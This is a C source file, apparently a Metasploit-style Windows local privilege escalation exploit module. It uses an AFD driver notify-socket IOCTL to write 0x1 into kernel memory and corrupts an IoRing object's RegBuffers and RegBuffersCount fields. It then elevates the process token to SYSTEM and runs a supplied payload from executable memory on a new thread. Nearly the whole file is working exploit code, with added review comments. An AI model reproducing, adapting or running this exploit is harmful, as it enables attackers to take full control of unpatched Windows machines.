#include <windows.h>
#include "exploit.h"
#include "ioring.h"

/*
 * InitialSetup - resolve the ntdll.dll routines used by this file.
 *
 * Looks up NtCreateFile, NtDeviceIoControlFile, NtCreateIoCompletion,
 * NtSetIoCompletion and NtQuerySystemInformation with GetProcAddress and
 * stores them in the matching function-pointer variables. Those variables
 * are declared outside this function, presumably in exploit.h.
 *
 * Returns TRUE when every routine was found. On success the ntdll module
 * reference is deliberately kept, so the resolved pointers stay valid. On
 * any failure a message is logged, the module reference (if any) is
 * released, and FALSE is returned.
 */
BOOL InitialSetup(void) {
	/*
	 * Call the wide-character entry point explicitly. The generic
	 * LoadLibrary macro accepts a wide string literal only when UNICODE is
	 * defined, so the original call depended on build settings.
	 */
	HMODULE hNtdll = LoadLibraryW(L"ntdll");

	if (!hNtdll) {
		dprintf("Unable to load ntdll.dll");
		goto failure;
	}

	if (!(NtCreateFile = (fNtCreateFile)GetProcAddress(hNtdll, "NtCreateFile"))) {
		dprintf("NtCreateFile() not found in ntdll.dll");
		goto failure;
	}

	if (!(NtDeviceIoControlFile = (fNtDeviceIoControlFile)GetProcAddress(hNtdll, "NtDeviceIoControlFile"))) {
		dprintf("NtDeviceIoControlFile() not found in ntdll.dll");
		goto failure;
	}

	if (!(NtCreateIoCompletion = (fNtCreateIoCompletion)GetProcAddress(hNtdll, "NtCreateIoCompletion"))) {
		dprintf("NtCreateIoCompletion() not found in ntdll.dll");
		goto failure;
	}

	if (!(NtSetIoCompletion = (fNtSetIoCompletion)GetProcAddress(hNtdll, "NtSetIoCompletion"))) {
		dprintf("NtSetIoCompletion() not found in ntdll.dll");
		goto failure;
	}

	if (!(NtQuerySystemInformation = (fNtQuerySystemInformation)GetProcAddress(hNtdll, "NtQuerySystemInformation"))) {
		dprintf("NtQuerySystemInformation() not found in ntdll.dll");
		goto failure;
	}

	/* Success: keep the module reference so the pointers above remain valid. */
	return TRUE;

failure:
	/* Drop the reference taken by LoadLibraryW, if it succeeded. */
	if (hNtdll) {
		FreeLibrary(hNtdll);
	}
	return FALSE;
}

/*
 * ArbitraryKernelWrite0x1 - issue AFD_NOTIFYSOCK_IOCTL with a caller-chosen
 * target pointer.
 *
 * The function:
 *   - creates an I/O completion port and queues one packet on it;
 *   - opens an AFD endpoint (\Device\Afd\Endpoint) using a hard-coded
 *     extended-attribute buffer;
 *   - fills an AFD_NOTIFYSOCK_DATA request whose pPwnPtr field is pPwnPtr;
 *   - sends that request to the endpoint with NtDeviceIoControlFile.
 *
 * NOTE(review): the name suggests the kernel-side handler ends up writing
 * the value 0x1 at pPwnPtr. That behavior lives outside this file and cannot
 * be confirmed from here.
 *
 * pPwnPtr - address stored in Data.pPwnPtr.
 *
 * Returns S_OK once the IOCTL has been issued; the IOCTL's NTSTATUS is NOT
 * checked. Returns E_FAIL if any setup step fails. On every path, the
 * completion port, endpoint, event and both VirtualAlloc buffers are
 * released before returning.
 */
HRESULT ArbitraryKernelWrite0x1(void* pPwnPtr) {
    HRESULT ret;
    NTSTATUS ntStatus;
    HANDLE hCompletion = INVALID_HANDLE_VALUE;
    IO_STATUS_BLOCK IoStatusBlock = { 0 };   // reused by NtSetIoCompletion, NtCreateFile and the IOCTL
    HANDLE hSocket = INVALID_HANDLE_VALUE;
    UNICODE_STRING ObjectFilePath = { 0 };
    OBJECT_ATTRIBUTES ObjectAttributes = { 0 };
    AFD_NOTIFYSOCK_DATA Data = { 0 };        // zeroed so cleanup can test pData1/pData2 safely
    HANDLE hEvent = NULL;
    HANDLE hThread = NULL;                   // NOTE(review): unused in this function

    // Hard-coded attributes for an IPv4 TCP socket
    // Layout, as read from the bytes:
    //   - EA name "AfdOpenPacketXX" (15 chars, length byte 0x0F);
    //   - value length 0x1E;
    //   - the value contains the dwords 2 / 1 / 6 (AF_INET, SOCK_STREAM,
    //     IPPROTO_TCP), consistent with the comment above.
    // The byte order must be kept exactly.
    BYTE bExtendedAttributes[] = {
        0x00, 0x00, 0x00, 0x00, 0x00, 0x0F, 0x1E, 0x00, 0x41, 0x66, 0x64, 0x4F, 0x70, 0x65, 0x6E, 0x50,
        0x61, 0x63, 0x6B, 0x65, 0x74, 0x58, 0x58, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
        0x02, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x06, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
        0x00, 0x00, 0x00, 0x00, 0x60, 0xEF, 0x3D, 0x47, 0xFE
    };

    // Completion port; the last argument (1) is passed through as NtCreateIoCompletion's final parameter.
    ntStatus = NtCreateIoCompletion(&hCompletion, MAXIMUM_ALLOWED, NULL, 1);

    if (ntStatus != STATUS_SUCCESS) {
        dprintf("NtCreateIoCompletion() failed (NTSTATUS=0x%X)", ntStatus);
        ret = E_FAIL;
        goto done;
    }

    // Queue one packet (key 0x1337, information 0x100) on the port.
    // Presumably the notify-socket request expects a non-empty port -- confirm.
    ntStatus = NtSetIoCompletion(hCompletion, 0x1337, &IoStatusBlock, 0, 0x100);

    if (ntStatus != STATUS_SUCCESS) {
        dprintf("NtSetIoCompletion() failed (NTSTATUS=0x%X)", ntStatus);
        ret = E_FAIL;
        goto done;
    }

    // Buffer points at a string literal; Length is in bytes, without the terminator.
    ObjectFilePath.Buffer = (PWSTR)L"\\Device\\Afd\\Endpoint";
    ObjectFilePath.Length = (USHORT)wcslen(ObjectFilePath.Buffer) * sizeof(wchar_t);
    ObjectFilePath.MaximumLength = ObjectFilePath.Length;

    ObjectAttributes.Length = sizeof(ObjectAttributes);
    ObjectAttributes.ObjectName = &ObjectFilePath;
    ObjectAttributes.Attributes = 0x40;   // OBJ_CASE_INSENSITIVE

    // CreateDisposition 1 == FILE_OPEN. The EA buffer selects the socket parameters.
    ntStatus = NtCreateFile(&hSocket, MAXIMUM_ALLOWED, &ObjectAttributes, &IoStatusBlock, NULL, 0, FILE_SHARE_READ | FILE_SHARE_WRITE, 1, 0, bExtendedAttributes, sizeof(bExtendedAttributes));

    if (ntStatus != STATUS_SUCCESS) {
        dprintf("NtCreateFile() failed (NTSTATUS=0x%X)", ntStatus);
        ret = E_FAIL;
        goto done;
    }

    Data.hCompletion = hCompletion;

    // Two 0x2000-byte read/write user buffers referenced by the request.
    Data.pData1 = VirtualAlloc(NULL, 0x2000, MEM_RESERVE | MEM_COMMIT, PAGE_READWRITE);
    if (!Data.pData1) {
        dprintf("Call #1 to VirtualAlloc() failed (0x%X)", GetLastError());
        ret = E_FAIL;
        goto done;
    }

    Data.pData2 = VirtualAlloc(NULL, 0x2000, MEM_RESERVE | MEM_COMMIT, PAGE_READWRITE);
    if (!Data.pData2) {
        dprintf("Call #2 to VirtualAlloc() failed (0x%X)", GetLastError());
        ret = E_FAIL;
        goto done;
    }

    // Request parameters.
    // NOTE(review): the exact meaning and units of these fields are defined
    // by AFD_NOTIFYSOCK_DATA elsewhere -- confirm before changing them.
    Data.dwCounter = 0x1;
    Data.dwLen = 0x1;
    Data.dwTimeout = 100000000;
    Data.pPwnPtr = pPwnPtr;

    // Auto-reset, initially non-signaled event passed to the IOCTL.
    hEvent = CreateEvent(NULL, 0, 0, NULL);

    if (!hEvent) {
        dprintf("Call to CreateEvent() failed (0x%X)", GetLastError());
        ret = E_FAIL;
        goto done;
    }

    // Input buffer length is fixed at 0x30 bytes. The returned NTSTATUS is
    // ignored, and the event is not waited on before cleanup closes it.
    NtDeviceIoControlFile(hSocket, hEvent, NULL, NULL, &IoStatusBlock, AFD_NOTIFYSOCK_IOCTL, &Data, 0x30, NULL, 0);

    ret = S_OK;

done:
    // Common cleanup for success and failure paths.
    if (hCompletion != INVALID_HANDLE_VALUE) {
        CloseHandle(hCompletion);
    }

    if (hSocket != INVALID_HANDLE_VALUE) {
        CloseHandle(hSocket);
    }

    if (hEvent) {
        CloseHandle(hEvent);
    }

    if (Data.pData1) {
        VirtualFree(Data.pData1, 0, MEM_RELEASE);
    }

    if (Data.pData2) {
        VirtualFree(Data.pData2, 0, MEM_RELEASE);
    }

    return ret;
}

/*
 * ExecutePayload - copy a payload into executable memory and start it on a
 * new thread.
 *
 * pMsfPayload - descriptor whose cPayloadData holds dwSize bytes of code.
 *               A NULL descriptor is ignored.
 *
 * The function returns without waiting for the thread. On success the
 * executable buffer is intentionally NOT freed, because the new thread is
 * running from it. If allocation or thread creation fails, the function
 * returns silently; on thread-creation failure the buffer is released first.
 */
void ExecutePayload(PMSF_PAYLOAD pMsfPayload) {
    PVOID pPayload;
    HANDLE hThread;

    if (!pMsfPayload) {
        return;
    }

    /* With a NULL address, MEM_COMMIT also reserves the region. */
    pPayload = VirtualAlloc(NULL, pMsfPayload->dwSize, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
    if (!pPayload) {
        return;
    }

    CopyMemory(pPayload, &pMsfPayload->cPayloadData, pMsfPayload->dwSize);

    /* Explicit cast: C has no implicit conversion from void* to a function pointer. */
    hThread = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)pPayload, NULL, 0, NULL);
    if (!hThread) {
        /* No thread is using the buffer, so it is safe to release. */
        VirtualFree(pPayload, 0, MEM_RELEASE);
        return;
    }

    /* Closing the handle does not stop the thread; it only avoids leaking the handle. */
    CloseHandle(hThread);
}

/*
 * Exploit - module entry point.
 *
 * Runs the privilege-escalation sequence in a fixed order:
 *   1. InitialSetup()            - resolve the ntdll routines used in this file.
 *   2. IoRingSetup(&pIoRing)     - defined elsewhere; yields the IORING_OBJECT address.
 *   3. ArbitraryKernelWrite0x1() - called on pIoRing->RegBuffers (+3 bytes),
 *                                  then on pIoRing->RegBuffersCount.
 *   4. IoRingLpe(pid, 0x1000000, 0x1) - defined elsewhere; per the log
 *                                  message, elevates this process's token.
 *   5. ExecutePayload(pPayload)  - runs the payload on a new thread.
 *
 * pPayload - passed unchanged to ExecutePayload; presumably a PMSF_PAYLOAD.
 *
 * Returns EXIT_FAILURE as soon as any step 1-4 fails; nothing set up by
 * earlier steps is torn down here. Otherwise returns EXIT_SUCCESS.
 * ExecutePayload reports no status, so success does not guarantee the
 * payload actually started.
 */
DWORD Exploit(PVOID pPayload) {
    dprintf("Starting exploit...");

	PIORING_OBJECT pIoRing = NULL;
    DWORD dwPidSelf = GetCurrentProcessId();   // forwarded to IoRingLpe

	if (!InitialSetup()) {
		dprintf("Initial setup failure");
		return EXIT_FAILURE;
	}

	if (IoRingSetup(&pIoRing) != S_OK) {
		dprintf("IORING setup failed");
		return EXIT_FAILURE;
	}

	// NOTE(review): %llx with a pointer argument; %p would be the portable specifier.
	dprintf("IoRing Obj Address at %llx", pIoRing);

	// Targets byte offset 3 of the RegBuffers field. Little-endian byte 3 set
	// to 0x1 yields 0x1000000, as the next log line states -- this assumes
	// the field's other bytes were zero; confirm.
	if (ArbitraryKernelWrite0x1((char*)&pIoRing->RegBuffers + 0x3) != S_OK) {
		dprintf("IoRing->RegBuffers overwrite failed");
		return EXIT_FAILURE;
	}

    dprintf("IoRing->RegBuffers overwritten with address 0x1000000");

    // Targets the first byte of RegBuffersCount (logged as becoming 0x1).
    if (ArbitraryKernelWrite0x1((char*)&pIoRing->RegBuffersCount) != S_OK) {
        dprintf("IoRing->RegBuffersCount overwrite failed");
        return EXIT_FAILURE;
    }

    dprintf("IoRing->RegBuffersCount overwritten with 0x1");

    // The 0x1000000 / 0x1 arguments mirror the values written above.
    if (IoRingLpe(dwPidSelf, 0x1000000, 0x1) != S_OK) {
        dprintf("LPE Failed");
        return EXIT_FAILURE;
    }

    dprintf("Current process token elevated to SYSTEM!");
    
    ExecutePayload(pPayload);
    
    dprintf("The payload has been executed");
    
    return EXIT_SUCCESS;
}